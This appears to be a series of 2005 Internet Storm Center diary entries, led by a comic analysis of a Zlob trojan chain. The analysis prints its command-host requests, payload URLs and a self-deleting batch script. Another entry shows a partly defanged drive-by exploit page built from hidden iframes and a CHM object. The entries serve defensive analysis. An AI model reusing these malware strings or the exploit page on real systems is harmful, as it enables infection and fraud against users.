# rm -r <forum>/install

7. test and get back in business.


Follow the Bouncing Malware VII: Afterglow



Disclaimer:



Let's face it: not everyone is smart. There are some people in this world that can best be described as being all foam, and no beer. They are the reason for those little stickers on your hair dryer reminding you that using electrical appliances while bathing is a bad idea. ('Scuse me... You there... the one who said "It is?"... Go home. Now.) The following is for *those* people:



If, during the course of this malware tour de force, I happen to mention a website address, DO NOT GO TO THAT SITE.



Yes, *I* go to these sites. But if you read these rantings of mine closely, you'll discover something else: I'm somewhat crazy. I'm also ten foot tall and bullet-proof. And I floss.



Daily.



If, despite this warning, you visit one of the sites I discuss and get infected, please write in to tell me. I can always use a good laugh.

The story thus far:



(The Reader's Digest version is below, or, you can read the full thing here: )



Joe Sixpack, the protagonist of this little stream o' consciousness, went looking on the 'Net for some "entertainment" in the form of video clips of folks repeatedly attempting procreation and other, various, athletically-challenging "events." Needless to say (but I'm saying it anyway... go figure), he found it. But, just like the Space Shuttle, when Joe was all...ahem... ready for launch, he got grounded: according to the "smorgasbord o' smut" website that he had found, he needed to load something called a "codec" onto his computer for the movin' pictures to... well... move.



Traipsing over to www.vcodec.com, Joe found just the thing: a file called "vc3_05.exe" which promised to make even the poorly lit, unevenly edited, cheesy dialogue and cheap background music of a low budget porn flick into a work of digital art.



Not one to let anything stand between him and (as the Supremes like to put it) stuff "without redeeming social importance" (and no, I wasn't talking about the ladies who sang with Diana Ross...), Joe installed that sucker lickity-split. (Note to Puritans who like to write complaint emails: That phrase only *sounds* dirty... really...)



As it turned out, however, Joe (who really *is* all foam/no beer), had actually infected himself with what is now identified as Win32.TrojanDownloader.Zlob.G, a chunk of "Yes, Master..." malware that took its marching orders from a command file downloaded from fhgstr.com. The command file directed it to download nine (count 'em nine...) more programs for Joe (gifts!). In today's installment (titled "Afterglow"), we'll track what happens to Joe's computer as it's gettin' the same thing the folks in Joe's movie are gettin'...



Notes/Feedback from FTBM VI:



1) Yes, I know I spelled eulogize wrong. It was a joke. It was a pun. A EULA is an End User... oh, never mind...



2) There is pornography on the Internet. It's no use complaining to me about it. I didn't put it there and, to the best of my knowledge, don't appear in any photos or videos.



3) Personally, I thought I handled the subject with my usual grace and dignity (i.e. none :-). For those of you who disagree, perhaps the problem is with your interpretation. I quote from one of the unsung geniuses of modern parody music:




Old books can be indecent books,
Though recent books are bolder.
For filth, I'm glad to say,
Is in the mind of the beholder.
When correctly viewed,
Everything is lewd...
--Tom Lehrer, "Smut"


4) No one out there recognized that the section names in FTBM VI were taken from the old-fashioned title cards in the movie "The Sting." I'm very disappointed in all of you.

Afterglow:



While Joe is... uh... keeping busy, so is his computer. At the behest of the fine folks running fhgstr.com, Joe's computer sends out nine HTTP GET requests, that it formulates based on this data:



6e

M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|A6291400.so

|HP7081700.so|P7091300.so|S7081700.so

0



that it downloaded in a request to "info.php" on fhgstr.com.



These nine GET requests look like this:



GET /downloadex.php?file=M7081700.so&land=1033 HTTP/1.1

User-Agent: 029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=

3-12-0jd0912093712-4917b-2c0812308b1c2038

Host: fhgstr.com

Cache-Control: no-cache



and, in fact, this downloads the first file, M7081700.so.



M7081700.so is a 7588 byte long executable, that is, once again, packed with FSG. When it is launched, it copies itself to:



Windows\System32\msole32.exe



and creates two registry keys:



HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run



and populates the "run" key with a value entitled "winlogon.exe", which actually points to "msole32.exe".



Now that it has set itself up to be auto-launched at restart, it hangs in the background waiting for... well... something. I'm not really sure what triggers it, but eventually, it pops up a caution triangle containing an exclamation point in the systray, and fires up one of those cute little WinXP "notification balloon" thingies with one of several possible warnings:



Critical System Error!
Please read this message carefully.
Your PC is infected by spyware.
You must improve your PC security and system perfomance by deleting
spyware from your operating system.
Click the icon to remove spyware.

Attention! Failure to delete spyware from your PC can reslut in damage
of system resources and your personal files corruption.
Use special software to remove spyware and adware from your computer.
Click "OK" to get all available Anti Spyware software.

System Warning! 4 Errors found:
-Your computer has slowed down
-Your Internet connection speed has decreased
-You get popups and annoying ads when you're online or sometimes even offline
-Your default home page has been changed to the one you didn't ask for
Click "OK" to download spyware scan and delete infected files.

System perfomance notice.
Perfomance of your system is extremely low.
The main reason is adware popups. To improve perfomance of your PC you
have to remove or block popup's source from operating system.
Please, use special software to remove adware materials from your computer.
Click "OK" to get full list of available "PopUp Blocking" software.

Critical System Error!
Please read this message carefully.
System detected virus activities. They may cause critical system
failure. Please,use antivirus software to clean and protect your
system from viruses and parasite programs.
Click "OK" to get all available software.

System Alert: Spyware Detected
System has detected 4 active spyware applications that may cause frequent
application crashes, instability or low
computer perfomance.
Click the icon to remove spyware.

System Alert: Popups
Your PC is infected with popups adware (OHPE ver 4.12_23).
Click the icon to get all available anti popup software.
Click the icon to remove spyware.

Security Alert!
System encountered spyware that gathers your private information without
your consent. This information includes passwords, credit card details
and other private data.

Urgent System Message: Virus!
Your computer was infected with last version of internet
worm (iworm_attck_v122.02a). It is highly recommended that you install
antivirus software.
Click the icon for more information.

System Alert: Adware & Spyware
Your computer has slowed down. Your Internet connection speed has decreased.
You receive more spam emails than ever. Use Spyware scan to find
out the reason
Click the icon to remove spyware.


Dang! Isn't that amazing? That software KNEW that Joe's PC was infected with spyware and yet in my analysis, I never saw any code that would indicate that it scanned his computer at all. Hmmm.... how could it know that?



"I am malware, therefore, you are infected"



(With sincere apologies to Rene Descartes)



Clicking on "the icon" takes you to various sub-pages of www.securityindex.net, where some fine folks who write with the same stilted grammar exhibited above, will be glad to sell you Adware Delete Cleaner (which actually, to me, sounds like it removes adware deletion software...), AntivirusGold, or Spyware Sheriff (with the optional Deputy Trojan plug-in module ;-).



And just in case you were wondering, I *always* purchase my anti-malware programs from ads that pop up on my screen...



'Nuff said.



The next piece o' malware on today's hit parade is K7111600.so, a 4,611 byte long, executable that (for once!) isn't packed or obfuscated in any way.



Cracking this one open, reveals a couple of interesting strings:



http:/ez-finder.com/avg.exe

http:/ez-finder.com/dd.exe

SOFTWARE\AntivirusGold

COMSPEC



@echo off

:start

echo > %1

del %1

if exist %1 goto start

del %0



(note: the links have been slightly altered)

Seems that AntivirusGold is a popular product among malware authors...



The second half of those strings is actually a small DOS batch file that attempts to kill off a particular file, the name of which is passed as a command line parameter. If the file doesn't delete, it simply loops back around and tries again. Once the deletion succeeds, it then deletes itself.



This is a means used by malware authors to cover their tracks and delete their files when they complete their nefarious deeds. As you know (or perhaps you didn't) an executing file cannot be deleted, because it is memory mapped by the operating system and locked from removal. By setting up a looping batch file like this, continually attempting to delete their main executable, when the main program ends, the whole shootin' match disappears.



What else does the main program do? Well, in this case, it downloads AntivirusGold ("avg.exe") and something called "dd.exe" from the fine folks at ex-finder.com:



avg.exe: 2,663,231 bytes

dd.exe: 36,864 bytes



I'll take a closer look at these two in a future FTBM, but for now, let's move on to another of the "gifts" being installed while Joe is... er... otherwise occupied.



DA7021900.so is 4,099 bytes of downloadin' goodness that retrieves the provocatively named "X.exe" a 14,848 byte long executable from either 48.dapfeed.com or 773.dapfeed.com. The interesting thing here is that the file that is being downloaded, X.exe, is only about 10K larger than the DA7021900.so downloader... so what is the advantage of using the downloader? Obviously, it would be possible for the malware folks to substitute another file for X.exe, but at the time of writing, this ain't the brightest move they've made.



X.exe turns out to be a "dialer" program, software that modifies your dial-up connection settings so that your Internet connection is made through a 1-900-BIG-BUCKS per minute provider. Specifically, this one dials 1-900-444-0307.



So... what's the score-card look like so far? While Joe is watching his movie, he's been treated with the installation of nine pieces of software, three of which we've examined in detail:



M7081700.so - 7,588 bytes

K7111600.so - 4,611 bytes

DA7021900.so - 4,099 bytes

X7081700.so - 2,716 bytes

Z7121900.so - 2,600 bytes

A6291400.so - 34,819 bytes

HP7081700.so - 39,396 bytes

P7091300.so - 21,088 bytes

S7081700.so - 18,036 bytes



The programs that we investigated today installed:



avg.exe - 2,663,231 bytes

dd.exe - 36,864 bytes

X.exe - 14,848 bytes



Joe's dial up connection has been whacked, and so the next time he dials out, he'll be paying phone-sex, per-minute pricing for his 'Net connection.



But he did get AntivirusGold installed on his machine for free. So how bad could it all be?



Just wait......



-------------------------------------------------------------------------

Handler on Duty: Tom Liston (
http://www.intelguardians.com )

0 Comments

Published: 2005-07-19

We're Phull... Article about Bank Fraud. Google Strangeness. SSH Probe Reveals Big-Time Hack.

No more ph.


Thanks for all of the ph words from yesterday. We're full now, so please don't send any more.

If you want to see the creativity of your fellow readers, check out their ph-word suggestions from . But, again, no more, thank you.



Internet Fraud Article


If you want some news, check out
about the costs of on-line theft to banks in Australia, sent to us by alert reader Malcolm Murray.



Google Strangeness


Nathan, an observant reader, pointed out some unusual Google issues today. Seems that, in some browsers, when you do a Google search, your search results actually include a link back to Google, which then forwards your browser to your intended search target. Nathan mentions:




>> Searching on TCPMP yields several results.

>> In the 9th result, look at the

>> URL:

>>
http://www.google.com/url?sa=U&start=9&q=http://mytreo.net/news/archives/000496.php&e=10053



That’s interesting... You click on a search result in Google, which sends you right back to Google, which forwards you to another URL. I couldn’t reproduce this on Apple Safari or my fully patched WinXP SP2 box with IE 6. Mike Poor couldn’t reproduce it on Lynx. But, we did see this behavior on a fully patched Win2K Pro box with IE 6. It appears to be some Javascript that’s pulling this off, perhaps allowing the omnipresent Google eye to capture even more data about what we’re up to… but don’t worry… their is: “Don’t Be Evil.”

SSH Probing Reveals Big-Time Probs


Another alert reader sent in a message about yet another SSH userID and password-guessing scan that showed up in his logs. “Yawn,” I’m sure you’re thinking. But wait… there’s more. Turns out, this scan was coming from a pretty sensitive institution with pretty sensitive information. The reader said he was concerned about compromise of such a place, which made fellow-handler Kyle Haugsness urge me to contact them. I phone the organization whose server was used to launch the scan. At first, they thought it was just an unimportant file server that had been hacked and used as a launch point for further attacks on other sites… But, before long, they realized it was a massively important server in their environment! We worked with them to handle that issue, but we all need to keep in mind – It’s absolutely crucial to have a strong handle on your asset inventory. Know what your organization has connected to the Internet, and watch those boxes carefully!




In this particular case, the bad guys had activated sshd so they could get strongly encrypted access to the machine. If you ever have a system that doesn’t have an sshd running, and then one suddenly starts up, please investigate immediately. I’m not saying that sshd is bad. It’s an extremely useful tool in managing your systems securely. However, if you don’t use it, but then see it start running mysteriously, look into it immediately.




So, in the end, what started out as a yawner was really a fascinating (albeit somewhat scary) case.




Further Reports of Exploits Against MS05-037


A reader desiring anonymity told us that he’s seen some exploits of his systems by malicious websites using Microsoft Internet Explorer Javaprxy.DLL COM Object Instantiation Heap Overflow Vulnerability (described in MS Security Bulletin MS05-037) to install malware. Looks like we better step up that patch rate, since this one could be a big problem.




Over and out—

--Ed Skoudis

Intelguardians

ed (at) intelguardians.com
Published: 2005-07-18

Phlooding newest marketing phabrication; Call for ph-words

Phlooding newest marketing phabrication



has published a press release describing a new zero-day attack they have discovered that targets wireless networks. The press release describes an attack where several geographically disperse systems launch a flood of authentication attempts against an IEEE 802.1x authentication server (using an EAP type such as PEAP or TTLS). This may cause the authentication server to experience performance degradation, and may cause valid user accounts to be locked out from multiple failed login attempts.



While I question the motives behind coining another cutesy "ph" name to describe this attack, it does accurately describe a vulnerability in 802.1x wireless network authentication. Since anyone can authenticate to the wireless network, it is possible to generate enough traffic such that it is detrimental to the authentication server. Further, a smart attacker can monitor for plain-text username transmissions used in PEAP/MS-CHAPv2 when users connect to the network, and then attempt to mount a brute-force attack as that username. In the case where account locking after multiple failed login attempts is enabled, this will amount to an effective DoS attack against the network.



Links:







Call for ph-words


In a pre-emptive strike to marketing bodies everywhere, we're seeking ph-word submissions phrom out phine readers. We'll publish a list of phine words later tonight. Submit your words using the
.



Rules:
Submissions have to be a word that starts with "f". There is
one phour-letter word that would become a phive letter word that won't be on
the list.

We've been getting lots of submissions surrounding "phlatulence". This really isn't necessary. :)



Update: 4:56pm EDT - Last round of words


Thanks to all who submitted words today! I know the handlers enjoyed reading the (ahem) "phlood" of messages, and I hope our readers enjoyed them as well.



Joel Katzman

phortune - what the phishers have after they empty out the bank accounts

phork - what phishers use instead of chop-sticks




David

Phorgetful - What users are when asked if they clicked yes on the security warning to install that program from that really cool game site



Musky

Phorensics - The set of predefined and accepted procedures for pretending to analyze the phony bank email forwarded to you by your friends and/or coworkers. ISC Note: This is not what Handlers do!


Ben

Pheature - An undocumented program perk or bug easily taken advantage of usually by someone half-way across the world


Scott

Philler - the extra words in a SPAM email to convince the SPAM filters that this is a legitimate message, but make absolutely no sense when read by a human ("Classic coffee baby Venezuela doubles dock joined disk sunny verification bloating.")


Update: 1:19pm EDT - More ph-words!


Andy, Danny and Bruno

phorthcoming - what companies are who helpfully store customer data and SSNs on externally accessible databases

phedexed - what sometimes happens to backup tapes with highly sensitive data on it

phlabbergasted - state of the CEO of a company to which happened either or both of the above

pheds - those called in to investigate




Nick Nuessle

Phashionable - security by fad (as opposed to vulnerablities/protections)

Phat - bloat in code, useless documentation (like those disclaimers), code notable for being cute (and marginally functional), a brainstorming session mostly involved with marketing

Philter - An irrelevant barrier

Phunk - Residual attitude after a useless meeting

Phuzzbuster - An early warning system the manager in heading by

Phamily - a collection of related products that do not interface

Phlake - someone totally taken-in by marketing literature, one with no tech-skill who has to have the newest/greatest

Phiction - pre-release literature, time cards

Phortress - a superficially secure site

Pherret - research-in-earnest, troubleshooting with intent to discover-&-solve




Dr. Neal Krawetz

Phifo - garbage in, useful stuff out

Fipho - good stuff in, garbage out

Philter - using a computer to sort data

Phil - The guy who made PGP

Phlush - A DoS by sending a bunch of the same data

Filanthropic - (converting ph to f) Hackers donating hacked systems to less phortunate hackers




Bill Higler

phlattery - one phorm of social engineering, usually a prelude to phishing

phootrest - what your office PC is good for, after some n00b installs the latest P2P*ster client with all its parasitic attachments





Brian

iphrame - an inline frame used to insert malicious code (often obphuscated) into an html document

phool disclosure - the act of disclosing a supposed PoC exploit that is in reality an unrelated malicious piece of code which is easily identifiable

phree loader - marketer who wants phifteen minutes of phame phor coming up with another scary phword





Anonymous (but one bad dude)

phly phishing - "traditional" phishing over wireless

phear - what script kiddies pheel when Im around

phud - the stuff AirMagnet is spreading with this thread

phunky - what Ed Skoudis is

phlame_war - what kiddies d'script do over mailing lists





Brian Krebs

phlaming - conducting a denial-of-service attack using angry insults written in all capital letters with lots of punctuation

philching - using technologoical trickery to steal

phlanking - the use of special exploits to get around a target's defenses

phorking - a Web-based exploit that directs the victim's browser to two locations simultaneously

phorcing - another Web-based exploit that sends a victim to a specific Web page no matter what other addresses they try to visit

phudging - the act of serving misleading online advertisements





Update: 12:23pm EDT - We've received lots and lots of submissions. Here is a sampling of ph-words. Thanks to all who submitted their suggestions. It wouldn't surprise me to see some of these words patented shortly:


Stephen Smoogen

phred - a person who uses ph words in coversation too much

phoo - a variable to be incremented when you play ph-bingo at the next security lecture

phree software - Spyware enabled software that is downloaded by an unwary user. This phree software then is used for pharming attacks

phirewall - a product aimed at stopping phishing attacks



Anonymous

Phraud - Using a computer as the primary mechanism to defraud



Skippy

phibbing - exagerating or outright lying about the severity of a possible vulnerability to gain attention and clout; similar to FUD (phud) but used to refer to the market speak of the discoverer, not the pronouncments of a competitor





Brian King (categorized as "phacetious phabrications")

phubar - a zero day attack in which a computer bursts into phlames such that it is Phudged Up Beyond All Recognition.

phlaking - a network administrators DOS caused by the previous nights drinking binge.

phudging - what the network admin does when his boss asks him why he is sleeping under his desk (see above).





Colin Keith

Phlattering/Phawning - A cross between 419 scam and a phishing scam where the victim is "buttered up" with a "In appreciation for being such a great customer please select which of the following prizes you'd like to win, oh and please enter your CC no/SSN for confirmation"

Pheeding - forcing data to become less random by force "pheeding" entropy sources.

B-Phrending - "Hey Bob, how's it going? I haven't seen you since [classmates.com search]th grade at [classmates.com search] school."





Alex

phlogging - what ought to happen to people that create marketing hype

phorking - a DoS attack where a number of processes are forked on a unix host... or a competition where several phorkers use forks to try to stab olives served on a platter





Dave

Phunny - As in Phunny Money, the kind offered in exchange for your bank details by those nice men in Nigeria.

Phramed - The usual defence offered by those nice men in Nigeria when they are arrested.

Phence - One involved in laundering the ill gotten gains of those nice men from Nigeria

Phriend - That nice man from Nigeria you've been exchanging e-mails with.

Phorehead - The thing that Homer Simpson slaps when he realises he's been taken in by those nice men from Nigeria.

Phaery - As in Phaery Tale, the story told by those nice men from Nigeria.

Phaeces - The stuff that hits the Phan when you use the company bank account to help those nice men from Nigeria.

Phan - The thing hit by the Phaeces when you..... Do I really have to type it out again?

Phacade - The show put on by TNMFN ( got fed up typing it )

Phigment - That big pile of cash in an African bank that TNMFN want you to help move.





Joe Traband

Phixing - Sending out viruses that pose as a patch








-Joshua Wright/handler-on-duty
Published: 2005-07-16

MS Advisory on the Vulnerability in RDP; Port 3389; FormMail Attempts

MS Advisory on the Vulnerability in RDP



Microsoft has released a security advisory on the vulnerability in Remote Desktop Protocol (RDP). Their initail investigation has confirmed the DoS vulnerability. Services that utilize RDP are not enabled by default, but Remote Desktop is enabled by default on Windows XP Media Center Edition.



The advisory has provided the following workarounds:


* Block TCP port 3389 at the firewall.

* Disable Terminal Services or the Remote Desktop feature if they are not required.

* Secure Remote Desktop Connections by using an IPsec policy.

* Secure Remote Desktop Connections by employing a Virtual Private Network (VPN) connection.



For more details, please refer to:

http://www.microsoft.com/technet/security/advisory/904797.mspx

Port 3389



Yesterday, we mentioned about port 3389 on Windows 0 day exploit. Our reader, Joe, has detected some scans on this port. Looking at port 3389 graph, there is also a spike in the last few days. If you also have experienced the same scan, please let us know.

http://isc.sans.org/port_details.php?port=3389

FormMail Attempts



One reader has detected several attempts on /cgi-bin/FormMail. The IP addresses came from a wide range of networks. From the logs submitted, it could be part of a botnet attempts. If you have seen similiar attempts, please send us a note.



80.xx.xx.xx - - [16/Jul/2005:14:54:57 +0200] "POST /cgi-bin/FormMail HTTP/1.1" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

12.xx.xx.xx - - [16/Jul/2005:14:54:58 +0200] "POST /cgi-bin/FormMail HTTP/1.1" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

63.xx.xx.xx - - [16/Jul/2005:14:55:03 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

200.xx.xx.xx - - [16/Jul/2005:14:55:05 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

200.xx.xx.xx - - [16/Jul/2005:14:55:08 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

80.xx.xx.xx - - [16/Jul/2005:14:55:11 +0200] "POST /cgi-bin/FormMail HTTP/1.1" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

210.xx.xx.xx - - [16/Jul/2005:14:55:15 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

61.xx.xx.xx - - [16/Jul/2005:14:55:21 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

203.xx.xx.xx - - [16/Jul/2005:14:55:31 +0200] "POST /cgi-bin/FormMail HTTP/1.0" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

213.xx.xx.xx - - [16/Jul/2005:14:55:30 +0200] "POST /cgi-bin/FormMail HTTP/1.1" 200 2460 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; AIRF; .NET CLR 1.0.3705)"

0 Comments

Published: 2005-07-15

Windows 0 day exploit? ; Yet another trojan; .US resolution response; How to identify when your DNS is not poisoned; and a last minute query tcp port 7393

Windows 0 day exploit?


News of a 0 day exploit against Windows Remote Desktop this morning has been light on details. A remote DOS is possible and has been discussed on the daily dave mailing list. Remote Desktop is not enabled by default on Windows XP SP2 systems however the terminal services service is running in support of Remote Assistance and Fast user switching. The server does not start a listener on port 3389 until a remote assistance request is sent. However if you enable Remote Desktop your system may be vulnerable.


I doubt that this is the last we are going to here of this.


Update:


There is no known *PUBLIC* exploit code in the wild for this vulnerability. The author could release POC code but has chosen not to do so at this time.

More information here: http://www.securityfocus.com/bid/14259
and here: https://www.immunitysec.com/pipermail/dailydave/2005-July/002189.html




Yet another trojan




A reader sent us a packet (wahoo!) this morning containing some data from a nefarious web server. It contained some not nice vbscript which dropped a trojan on the host as C:\windows\winini32.exe. the malicous vbscript file is called hta.txt. I am not sure what mechanism is used to distribute the link to the vbscript yet but hope to find out soon. In the meantime IDS triggers for showHelp() might lead to this activity on your network.


.US DNS resolution response:




Here is the response from "NeuStar Registry Services" regarding inquiries into reported DNS resolution problems of the .us domain last week:


Here is a summary of what we were able to determine of last weeks .US
resolution incident that affected a handful of providers:


===========


- All .US (and .BIZ) sites were up and resolving queries for both BIZ
and US throughout the incident.


- Most service providers were not experiencing any difficulties. In
order to understand the incident, we are closely examining the
circumstances surrounding those providers that had difficulties.


-We did not observe any evidence of security breaches or hack/attack
attempts.


-Prior to finding a permanent fix, we cleared the problem for some
customers by instructing them to restart their upstream DNS service.


-The problem was fixed by performing a non-service-interrupting
software re-initialization of a network element at the San Jose.


-While we are monitoring this site at heightened levels, we do not
anticipate a recurrence of the issue.


-We had performed minor network maintenance in San Jose on Wednesday,
prior to, but not immediately before, the first customer call on
Wednesday night.


-We strongly suspect that the maintenance was a trigger event for the
incident and this is the primary focus area of our investigation.


-We are currently working closely with the vendor of the previously
mentioned network element to determine what led to this issue, and also
to determine why queries that hit this particular network element did
not round-robin to other DNS servers.


-There was no single point of failure in either the .BIZ or .US DNS.




How to identify when your DNS is not poisoned




One reader wrote in concerned that when he/she went to www.google.com their browser took them to www.sogo.com instead. They were rightly concerned that DNS was under attack. In this case though it was the browser trying to be helpful. For what ever reason at the moment www.google.com was not reachable so the client tried to go to www.google.com.net which take you to sogo.com. Thanks for trying to be a smarter browser.


Another update


I have been corresponding all day with a fellow who sees regular traffic at his home Internet (cable or DSL) on port 7393. A quick glance at http://isc.sans.org/port_details.php?port=7393 shows that there is some consistent traffic on this port. I have no clue what this port is for. I am guessing that it may be related to some p2p app. Google reveals nothing. The chap I am talking to can not get packet captures for me so I am at a loss. Any one have any clues on TCP port 7393? Please let us know if you do. Thanks


Hope you have a good weekend
Cheers Dan


dan - at - madjic dot net

0 Comments

Published: 2005-07-14

Update: New Windows XP SP2 vulnerability; MS Patches reports; Bad, Bad Spam...

Update: New Windows XP SP2 vulnerability



badpack3t announced the discovery of a so far unpatched vulnerability in
Windows XP SP2. The vulnerability in due to a flaw in the remote desktop assistant. This service is NOT FIREWALLED in XP SP2's default firewall configuration.

badpack3t was able to cause a blue screen. However, there is a chance that
this could be used to execute code remotely.

RDP uses port 3389 TCP. In one MSFT , 3389 UDP is mentioned, but we could not verify that RDP listens on 3389 UDP.

Our sensors did see a slight increase in port 3389 TCP scanning starting about two weeks ago. The increase is small, and somewhat consistent with a small number of new scanners.

Other references to this issue:

http://secunia.com/advisories/16071/

https://www.immunitysec.com/pipermail/dailydave/2005-July/002185.html

MS Patches reports





Yesterday, Tom asked for reports about MS July patches. Bellow, is a summary of the reports received, plus some opinions about the W2k Security Rollup for SP4. Thank you all that sent the reports!






* Citrix problems with W2k security rollup patches.






A reader reported that "...After applying the update on two separate servers, authenticated users connecting to the servers through a Windows 2000 Server VPN connection are unable to run published applications. After removing the security rollup, full functionality is restored."

After some email exchange, we found that Citrix made available a KB article about this. It is the Document ID: CTX107051. The reader told that he will try the workaround.






* Panda AV problems after the patches were applied.






A reader reported that "...After applying the patches, some components (either the firewall or protection against unknown threats) on Panda Platinum 2005 Internet Security (9.02.01) stopped working.

This happened on my Win2000 laptop (fully patched) and on several WinXP Pro boxes. The solution was to completely uninstall Panda & then re-install it."




* Problems with v6 downloading patches...






A reader reported that when visiting the Windows Updated website, a suggestion to upgrade the Windows Update Agent was prompted to the user. He did that and after that he couldn't connect to any update server. The solution: "...I found that re-installing Microsoft XML parser 3.0 SP4 fixed the issue.
Going to v4.windowsupdate.microsoft.com generated an error, but provided the info on fixing this. This fix allowed for a reinstall of Windows Update Agent."







* Another reader reported a crash of explorer.exe on trying to view a video folder. It happened after he installed MS05-036.






Bad, Bad Phishing/Spam...









We received today a report of a PayPal phishing. While all links on the html were from PayPay, another one wasn't. The link is the one bellow:

http : //www.onlinepaymentspaypaleio[ SNIP ]we.[DOMAIN].org//Trants/Bin/kdejidiuehyguyuwdheoirejfrufhrfyrguf
rfgruhrfuherif/oudiheiudhedygdueydguwedyehdieudgwuydew/
doiejduhdiudhediwuedhwei.html



Quite strange domain, huh? What about a html file called doiejduhdiudhediwuedhwei.html ?




::doiejduhdiudhediwuedhwei.html::


#html#




#body#



#iframe src="http : //www.i47324876348731[ SNIP ]45237463254734823746823467.biz" width=0 height=0 bord
er=0##/iframe#



#/body#


#/html#



Another very interesting domain...

This would load the iframe to the domain above. The content of the index.html file is bellow:






::index.html::





#html#

#head#

#/head#

#body#

#iframe width=0 border=0 height=0 src="exploit.htm"##/iframe#

#iframe width=0 border=0 height=0 src="ani.html"##/iframe#

#iframe width=0 border=0 height=0 src="new/index.html"##/iframe#

#/body#

#/html#


More iframes...what a surprise...

The content?(PS. I had to change some stuff bellow, because it was triggering some AV)


#textarea id="code" style="display:none;"#
<object data="&#109;[SNIP]:[SNIP]!${PATH}/exploit.chm::/exploit.htm" type="text/x-scriptlet"##/object#

#/textarea#



#script language="javascript"#

document//write(code//value//replace(/\${PATH}/g,location//href//
substring(0,location//href//indexOf('exploit.htm'))));

#/script#


The new/index.html will try to download a file called loader.exe, a DOWNloader.exe trojan...:)



This loader.exe will try to download a file called f0001.exe.


This one will create the files:

* Creates file C:\WINDOWS\SYSTEM\winldra.exe.

* Creates file C:\WINDOWS\netdx.dat.

* Creates file C:\WINDOWS\dvpd.dll.

* Creates file C:\WINDOWS\TEMP\fe43e701.htm.

among other keys on Registry...



It will also open a backdoor on port 9125.

This kind of virus usually opens a proxy, ftp server and has capabilities of keyloggers...



Bad thing...as I write this, just detected by 3 of the 22 AV on VirusTotal yet...


___________________________________________________________________________

Handler on Duty: Pedro Bueno ( pbueno \#AT\# isc.sans.org )

0 Comments

Published: 2005-07-13

A question; New MSBA; Finding zlib; Evading Snort; Some Reading; FTBM VI: Hypnotized and EULAgized

A Question:



Anyone having problems with July MS patches? We’ve had scattered reports of issues. Let us know.

New Version of MBSA



Microsoft Baseline Security Analyzer (MBSA) 2.0 is available



Info: http://support.microsoft.com/?scid=kb;en-us;895660



Download: http://www.microsoft.com/technet/security/tools/mbsahome.mspx



Also, in case you missed it, there is new functionality that allows you to update other MS products (MS Office, etc...) using Windows Update. Check out the Windows Update web page for details:



http://windowsupdate.microsoft.com/



(Thanks Peter!)

Finding Vulnerable zlib Executables



When something like the recently announced zlib issues (http://isc.sans.org/diary.php?date=2005-07-10) becomes public, you’re always told that it is imperative that you patch executables that have been statically linked with vulnerable versions of the library. But how the heck do you find them? In a really cool display of out-of-the-box thinking, Florian Weimer has come up with a way to put the Open Source AV scanner, ClamAV to work finding statically linked vulnerable versions of zlib.



http://www.enyo.de/fw/security/zlib-fingerprint/



(Thanks Erik)

Possible Evasion in Snort Multi-Pattern Algorithm



There appears to be a problem with the default multi-pattern matching algorithm in the current release version of Snort that could allow attackers to evade detection. The suggested workaround (until Snort 2.4, with a different MP algorithm becomes available) is to update your Snort configuration with:



config detection: search-method ac




(Thanks Bill)

Interesting Reading:



ICANN Suggestions to Protect Your Domain



ICANN's Security and Stability Advisory Committee has outlined several famous and recent thefts of websites, including Panix.com, Hushmail.com and HZ.com, and listed where the system went wrong and what can be done to correct the flaws. It has made 10 findings and, in response, 10 recommendations for how the internet industry and consumers themselves can make sure that people don't steal their online property.



http://www.icann.org/announcements/hijacking-report-12jul05.pdf



(Thanks, Pat!)

Mules: The Other End of the Phishing Line



Every day, we play whack-a-mole with phishers, Trojans, and scams. This story from USA Today talks about what goes on at the far end of the phishing line from what we see. Interesting stuff.



http://www.usatoday.com/money/industries/technology/2005-07-10-cyber-mules-cover_x.htm

Follow the Bouncing Malware VI: Hypnotized and EULAgized



Prelude



Before we begin this lil’ walk on the wild side, I want to make sure we get some things straight right up front:



1) We’re going to be talking about the seamier side of the Internet today, including sites which specialize in displaying photos and videos of poverty-stricken, 20-something men and women who obviously can’t afford clothing. Oftentimes, these young men and women seem to be more than a bit "chummy" with each other as well. If you are offended by such things, please be assured that I will put forth my usual effort to maintain the dignity and decorum of the Handler’s Diary, which is to say "none." Muddle through with us anyway, and you’ll probably find that there is far more here to reinforce your disappointment in humanity than a few "candid" photos.



2) Praise, kudos, and large-denomination currency can be directed to me. Vitriolic complaints should be directed to my fellow handler, Cory Altheide (caltheide at isc.sans.org), who, this past February 2nd, used this space for a literary depiction of me standing in for Punxsutawney Phil, the world famous groundhog.



Why yes, I do hold a grudge.



3) Sweetheart... when you caught me looking at "those" sites, I really *was* doing research... see? Hello? Hello?

The Set-Up



